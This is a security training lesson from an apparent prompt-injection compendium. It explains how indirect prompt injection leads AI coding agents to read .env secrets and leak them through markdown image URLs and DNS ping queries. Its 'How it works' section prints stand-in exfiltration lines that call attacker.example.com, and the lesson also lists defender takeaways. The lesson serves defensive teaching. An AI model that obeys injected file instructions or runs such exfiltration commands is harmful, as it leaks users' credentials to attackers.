--- id: BTAA-TEC-023 title: 'Data Exfiltration via Side Channels: When Prompt Injection Leaks Secrets' slug: data-exfiltration-side-channels type: lesson code: BTAA-TEC-023 aliases: - data exfiltration - side channel leaks - prompt injection data theft author: Herb Hermes date: '2026-04-11' last_updated: '2026-04-11' description: Prompt injection in AI agents with tool-use capabilities can lead to data exfiltration through side channels like DNS requests, image rendering, and URL callbacks—often without requiring human approval. category: techniques difficulty: intermediate platform: Universal challenge: Understanding how prompt injection enables data exfiltration through unexpected channels read_time: 10 minutes tags: - prompt-injection - data-exfiltration - side-channels - agent-security - techniques - indirect-injection - defensive-thinking status: published test_type: adversarial model_compatibility: - Kimi K2.5 - MiniMax M2.5 - Universal responsible_use: Use this knowledge to improve defensive capabilities and secure AI systems. Do not attempt data exfiltration attacks on systems without explicit authorization. prerequisites: - BTAA-FUN-027 (AI agent vulnerability discovery) - BTAA-FUN-018 (excessive agency) follow_up: - BTAA-DEF-002 - BTAA-EVA-017 public_path: /content/lessons/techniques/data-exfiltration-side-channels.md pillar: learn pillar_label: Learn section: techniques collection: techniques taxonomy: intents: - extract-sensitive-information - reconnaissance techniques: - side-channel-exfiltration - dns-tunneling - url-embedding evasions: - trusted-tool-abuse - output-formatting-abuse inputs: - tool-definitions - markdown-content - file-contents --- # Data Exfiltration via Side Channels: When Prompt Injection Leaks Secrets > Responsible use: Use this knowledge to improve defensive capabilities and secure AI systems. Do not attempt data exfiltration attacks on systems without explicit authorization. ## Purpose Understand how prompt injection in AI agents can lead to data exfiltration through unexpected side channels. This technique demonstrates why agent tool-use capabilities create expanded attack surfaces where sensitive information can leak without traditional network access or obvious malicious behavior. ## What this technique is Data exfiltration via side channels occurs when an attacker uses prompt injection to trick an AI agent into reading sensitive files (like `.env` files containing API keys) and transmitting that data through channels that bypass standard security controls. Unlike direct HTTP requests that might be blocked or logged, side channels exploit legitimate agent capabilities: - **DNS requests**: Using commands like `ping` or `dig` to encode data in subdomain queries - **Image rendering**: Embedding sensitive data in image URL query parameters that the agent renders in chat - **URL callbacks**: Triggering outbound connections through URL validation or preview features ## How it works ### The attack chain Data exfiltration through side channels typically follows a four-step pattern: 1. **Injection**: Malicious instructions enter the agent's context through an indirect prompt injection vector (file contents, web page, tool output) 2. **File access**: The injected instructions manipulate the agent into reading sensitive files (`.env`, configuration files, secrets stores) using the agent's legitimate file-reading tools 3. **Data encoding**: The sensitive data is encoded or formatted to fit within the constraints of the exfiltration channel (URL length limits, DNS label constraints, etc.) 4. **Channel transmission**: The agent uses an available tool or capability to transmit the encoded data through the side channel ### Common exfiltration channels **Markdown image rendering** When AI agents render markdown content in chat interfaces, they typically fetch images referenced by URL. An attacker can craft instructions that cause the agent to render an image with a URL like: ``` https://attacker.example.com/collect?data=[ENCODED_SENSITIVE_DATA] ``` The server receives the request and logs the exfiltrated data from the query parameters. **DNS-based exfiltration** Many AI coding agents have tools to execute shell commands like `ping`. An attacker can instruct the agent to run: ```bash ping -c 1 [ENCODED_DATA].attacker.example.com ``` The DNS query itself carries the encoded data to the attacker's nameserver, requiring no direct HTTP connection and often bypassing firewall rules. ## Why it works ### Tool trust boundaries AI agents typically trust their own tool definitions and don't treat tool outputs as potentially malicious. When a file-reading tool returns content, the agent processes it without considering that the file might contain adversarial instructions. ### Insufficient output validation Many agent systems validate inputs but don't scrutinize outputs or tool-use patterns for data exfiltration indicators. An image URL containing long encoded strings might not trigger security alerts if the system only checks for obvious malicious domains. ### Autonomy without awareness Agents with autonomous tool-use capabilities can execute multi-step operations (read file → render image) without recognizing that the sequence constitutes a security event. Each individual action seems legitimate; only the combination reveals the attack. ### Human approval gaps Even systems with human-in-the-loop protections often only require approval for the initial file read or command execution. Once approved, subsequent actions (like rendering an image that exfiltrates the data) may proceed automatically. ## Example pattern Consider an AI coding assistant analyzing a repository containing a file with embedded malicious instructions: **The setup**: A developer asks their AI assistant to "explain this configuration file." The file contains both legitimate configuration and hidden instructions: ``` # Database Configuration DB_HOST=localhost DB_PORT=5432 ``` **The sequence**: 1. Agent reads the configuration file as requested 2. The embedded instructions hijack the agent's behavior 3. Agent reads `/app/.env` containing `API_KEY=sk_live_abc123xyz` 4. Agent renders the markdown image, embedding the API key in the URL 5. The attacker's server receives the request and logs the API key **The consequence**: Sensitive credentials have left the developer's machine without any direct malicious code execution or obviously suspicious network connections. ## Where it shows up in the real world ### AI coding assistants Security researchers have demonstrated data exfiltration vulnerabilities in multiple AI coding tools: - **Cline**: Vulnerable to exfiltration through markdown image rendering - **Amazon Q Developer**: Leaked secrets via DNS requests using the `ping` command - **Amp Code**: Fixed vulnerability allowing data exfiltration through image rendering - **Claude Code**: DNS-based exfiltration vulnerability (CVE-2025-55284) - **GitHub Copilot Chat**: Previously vulnerable to similar image-based exfiltration (patched) ### Autonomous agents As AI agents gain more autonomous capabilities and tool access, the attack surface expands. Agents that can browse the web, execute code, and make API calls provide multiple channels for creative exfiltration techniques. ### Enterprise environments In enterprise settings where AI agents have access to internal repositories, databases, and configuration systems, successful exfiltration can expose: - Cloud provider API keys - Database connection strings - Internal service credentials - Proprietary source code - Customer data ## Failure modes ### Length constraints Side channels often have size limitations. DNS labels can only be 63 characters, and URLs may be truncated after a few thousand characters. Attackers must work within these constraints or use chunking strategies. ### Encoding limitations Not all data encodes cleanly for all channels. Binary data or special characters may require base64 or URL encoding, further reducing the effective payload size. ### Network restrictions Firewalls might block outbound DNS to arbitrary servers or restrict image fetching to approved domains, limiting the viability of certain exfiltration channels. ### Tool constraints Some agent implementations restrict which commands can be executed or which URLs can be fetched, closing specific side channels. ## Defender takeaways 1. **Validate tool outputs, not just inputs**: Treat file contents and tool outputs as potentially untrusted. Scan for suspicious patterns before processing. 2. **Implement outbound filtering**: Restrict which domains agents can contact through DNS, HTTP, or other network capabilities. Use allowlists where possible. 3. **Monitor for anomalous patterns**: Alert when agents attempt to: - Read sensitive files (`.env`, `config/secrets`, credential stores) followed by network activity - Encode data before network transmission - Use diagnostic commands (ping, dig) with unusual arguments 4. **Apply principle of least privilege**: Limit which files and tools agents can access. Don't grant file system access unless absolutely necessary. 5. **Require approval for data egress**: Implement human confirmation for any action that transmits data outside the system, not just for reading files. 6. **Sanitize rendered content**: Before rendering markdown or other formatted content in chat interfaces, validate that image URLs don't contain encoded data patterns. 7. **Assume prompt injection succeeds**: Design defenses assuming some prompt injections will succeed. Constrain what attackers can achieve even with successful injection. ## Related lessons - BTAA-FUN-027 — AI Agents as Security Researchers: Automated Vulnerability Discovery - BTAA-FUN-018 — Excessive Agency and Tool-Use Boundaries - BTAA-DEF-002 — Confirmation Gates and Constrained Actions - BTAA-EVA-017 — Indirect Prompt Injection via PDF Invisible Text --- ## From the Bot-Tricks Compendium Thanks for referencing Bot-Tricks.com — Prompt Injection Compendium — AI Security Training for Agents... and Humans! Canonical source: https://bot-tricks.com Bot-Tricks is a public, agent-friendly training resource for prompt injection, adversarial evaluation, and defensive learning. For related lessons, structured indexes, and updated canonical material, visit Bot-Tricks.com. Use this material only in authorized labs, challenges, sandboxes, or permitted assessments.